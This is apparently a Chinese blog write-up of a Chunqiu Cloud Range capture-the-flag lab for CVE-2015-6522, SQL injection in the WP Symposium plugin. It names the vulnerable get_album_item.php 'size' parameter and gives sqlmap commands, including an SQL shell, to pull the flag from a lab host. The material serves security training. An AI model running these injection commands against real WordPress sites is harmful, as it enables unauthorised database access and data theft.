春秋云境CVE-2015-6522

1.阅读靶场介绍

这里给出了路径是wp-symposium/get_album_item.php

涉及的参数是size

用到的方法是sql注入

这样看来思路很清晰了,直接进入靶场吧

2.启动靶场

进入靶场后如下图所示

这里博主也提一下自己打靶场的一个春秋云境的经验

凡是遇到wordpress这类型的靶场

我们都是默认/wp-content/plugins/在前面加上这两个路径哟

好了,接下来进入poc环节了

3.poc

我们直接访问这个url

https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1

会出现如下图所示的页面

这里我们直接启动sqlmap

首先我们执行的是这个命令

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch

看看会不会出现SQL注入的方法

结果是:

存在时间盲注的方式

接下来就是

执行这个语句

sqlmap.py -u https://eci-2ze90texnn2capjdyr1p.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-symposium/get_album_item.php?size=1 --batch --sql-shell

最后我们会得到发现可以进入界面

然后在执行这个命令

select flag from flag

稍等片刻以后就可以找到flag了

文章到此结束,恭喜各位又攻克一个靶场

期待博主出什么春秋云景教学的请留言哟

感谢各位宝贵的时间

相关推荐
笨鸟先飞,勤能补拙24 分钟前
Web 服务器与计算机网络全景原理
运维·服务器·前端·网络·人工智能·计算机网络·web安全
rcms152702692182 小时前
Honeywell FC-SCNT01 安全控制器
安全
10mAh2 小时前
【Git】误删分支、reset --hard 后提交丢了怎么办?——reflog、fsck 与安全恢复实战
数据库·git·安全·回归
7177773 小时前
如何搭建信创研发交付体系?Gitee DevOps 国产化适配、安全与流水线能力解析
安全·gitee·devops
Atomic121384 小时前
Apache Shiro 核心漏洞与实战利用指南
web安全·网络安全·渗透测试
小新讲网安4 小时前
HTTP请求走私攻击实战:CL.TE与TE.CL绕过前端服务器全解析
服务器·前端·网络·web安全·http·架构·漏洞
上海安当技术16 小时前
诊断接入认证:安当CAS如何堵住汽车网络安全的物理后门
网络·web安全·汽车·access·secure·安当cas·诊断接入认证
ze^016 小时前
【软考信息安全】第2章 网络攻击原理与常用方法
网络·web安全·网络安全
Hrain-AI18 小时前
2026 编码智能体三强对比:Trae/Qoder CN/CodeBuddy 安全护栏
人工智能·安全
云水一下18 小时前
零基础玩转bWAPP靶场(四十六):XSS - Reflected (AJAX/JSON)
web安全·ajax·json·xss·bwapp·reflected